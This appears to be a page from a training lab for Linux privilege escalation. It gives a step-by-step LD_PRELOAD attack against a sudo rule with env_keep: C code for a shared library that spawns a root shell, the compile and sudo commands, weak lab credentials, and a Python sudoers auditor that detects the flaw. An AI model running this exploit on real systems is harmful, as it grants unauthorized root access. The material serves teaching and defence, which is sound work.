🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

Environment Variable Exploitation — LD_PRELOAD

PRIVILEGE ESCALATION
# Scenario: sudo allows a program but env_keep includes LD_PRELOAD
# /etc/sudoers contains:
# Defaults env_keep+=LD_PRELOAD
# ram ALL=(ALL) NOPASSWD: /usr/sbin/apache2

# LD_PRELOAD makes the dynamic loader map the named shared library before any other,
# so its initializer runs before the target program's main(). sudo normally strips
# LD_* variables (env_reset), but env_keep re-adds LD_PRELOAD here.
# We create a malicious .so whose initializer spawns a shell

# Step 1: Write malicious C code (shell.c)
cat > /tmp/shell.c << 'EOF'
#include <stdio.h>
#include <stdlib.h>   /* unsetenv, system */
#include <unistd.h>   /* setuid, setgid */

/* Runs as the library initializer (built with -nostartfiles) before apache2's main() */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-injecting into the child shell */
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
EOF

# Step 2: Compile as shared library
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles

# Step 3: Run sudo with LD_PRELOAD pointing to our library
sudo LD_PRELOAD=/tmp/shell.so apache2
# Result: root shell spawned from the library initializer before apache2's main() runs

# Also check for LD_LIBRARY_PATH abuse:
# If a SUID binary loads a shared library from a writable path,
# create a fake version of that library with _init() that spawns a shell
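A defender-side check for the misconfiguration this lab targets, added here as example code (not part of the lab): it parses sudoers text for env_keep entries that retain dynamic-loader variables and reports the NOPASSWD rules they combine with. The sample sudoers content is constructed from the lab's two lines plus a quoted-list variant.

```python
"""Audit sudoers text for env_keep entries that preserve dynamic-loader variables
(the misconfiguration this lab exploits). Added example; sample input is constructed."""
import re

# Variables that let the caller pick code the dynamic loader runs inside the
# sudo-spawned process; sudo's env_reset strips them unless env_keep restores them.
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}
ENV_KEEP_RE = re.compile(r"^Defaults\S*\s+env_keep\s*(\+=|-=|=)\s*(.+)$")

def _directives(sudoers_text):
    """Yield non-empty lines with comments stripped (sudoers uses # for comments)."""
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line

def env_keep_vars(sudoers_text):
    """Return the variables env_keep retains, applying =, += and -= in file order."""
    kept = set()
    for line in _directives(sudoers_text):
        m = ENV_KEEP_RE.match(line)
        if not m:
            continue
        op, names = m.group(1), set(m.group(2).strip().strip('"').split())  # quoted lists
        kept = names if op == "=" else (kept | names if op == "+=" else kept - names)
    return kept

def nopasswd_rules(sudoers_text):
    """Return (user, command_spec) pairs for user specifications tagged NOPASSWD."""
    return [(line.split()[0], line.split("NOPASSWD:", 1)[1].strip())
            for line in _directives(sudoers_text)
            if not line.startswith("Defaults") and "NOPASSWD:" in line]

def audit_sudoers(sudoers_text):
    """Return findings as strings; an empty list means no loader variable survives env_reset."""
    risky = sorted(env_keep_vars(sudoers_text) & LOADER_VARS)
    findings = [f"env_keep preserves {v}: any sudo-permitted command can load caller-supplied code"
                for v in risky]
    if risky:  # a passwordless rule removes the last obstacle, so report it alongside
        findings += [f"{user} runs '{cmd}' via sudo with NOPASSWD" for user, cmd in nopasswd_rules(sudoers_text)]
    return findings

# Constructed sample: the lab's two sudoers lines plus a quoted-list variant.
SAMPLE_SUDOERS = """\
Defaults env_keep+=LD_PRELOAD
Defaults env_keep += "LD_LIBRARY_PATH LANG"
ram ALL=(ALL) NOPASSWD: /usr/sbin/apache2
"""
```

Running `audit_sudoers(SAMPLE_SUDOERS)` yields two env_keep findings (LD_LIBRARY_PATH and LD_PRELOAD) followed by the passwordless apache2 rule; the LANG entry is ignored because it is not a loader variable.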